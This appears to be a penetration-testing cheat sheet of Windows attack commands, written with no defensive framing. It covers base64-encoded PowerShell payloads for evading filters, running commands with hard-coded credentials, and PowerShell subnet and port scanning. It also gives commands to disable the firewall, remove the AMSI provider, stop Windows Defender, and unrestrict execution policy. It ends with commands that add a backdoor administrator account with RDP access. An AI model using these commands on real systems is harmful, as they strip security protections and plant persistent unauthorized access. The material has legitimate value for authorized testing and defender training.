#
Windows Tricks
#
PowerShell encoded base64
Create a base64 payload to avoid bad characters.
# Create the command to PowerShell execute
$ echo -n 'ping -n 2 10.10.14.2' | iconv -t utf-16le | base64 -w 0
cABpAG4AZwAgAC0AbgAgADIAIAAxADAALgAxADAALgAxADQALgAyAA==
# Run PowerShell with Encoded flag
Payload: cmd /c powershell -nop -enc cABpAG4AZwAgAC0AbgAgADIAIAAxADAALgAxADAALgAxADQALgAyAA==
#
Run command as User (with creds)
$pass = ConvertTo-SecureString "aliceishere" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("disco\\Alice", $pass)
Invoke-Command -ComputerName disco -Credential $cred -ScriptBlock {whoami}
#
List running process with args
WMIC path win32_process get Caption,Processid,Commandline
#
Scan for hosts and open ports in subnet
# Scan for Hosts in Subnet
PS > 1..254 | ForEach-Object {Test-Connection -ComputerName "172.16.2.$_" -Count 1 -ErrorAction SilentlyContinue}
# Scan for open Ports
PS > 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("172.16.2.101",$)) "Port $ is open!"} 2>$null
#
PowerShell
# PowerShell Directory
c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
# FIX THE VARIABLE PATH
set PATH=%SystemRoot%\system32;%SystemRoot%;
#
Search for files
Get-Childitem –Path C:\ -Include *filetosearch* -Recurse -ErrorAction SilentlyContinue
#
Windows Security
#
Disable Firewall
NetSh Advfirewall set allprofiles state off
#
Disable AMSI
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
#
Disable Defender
sc stop WinDefend
#
Execution Policy
Set-ExecutionPolicy Unrestricted
Set-ExecutionPolicy Unrestricted -Scope CurrentUser
#
Add a RDP user
net user hacker hacker123 /add
net localgroup Administrators hacker /add
net localgroup "Remote Desktop Users" hacker /ADD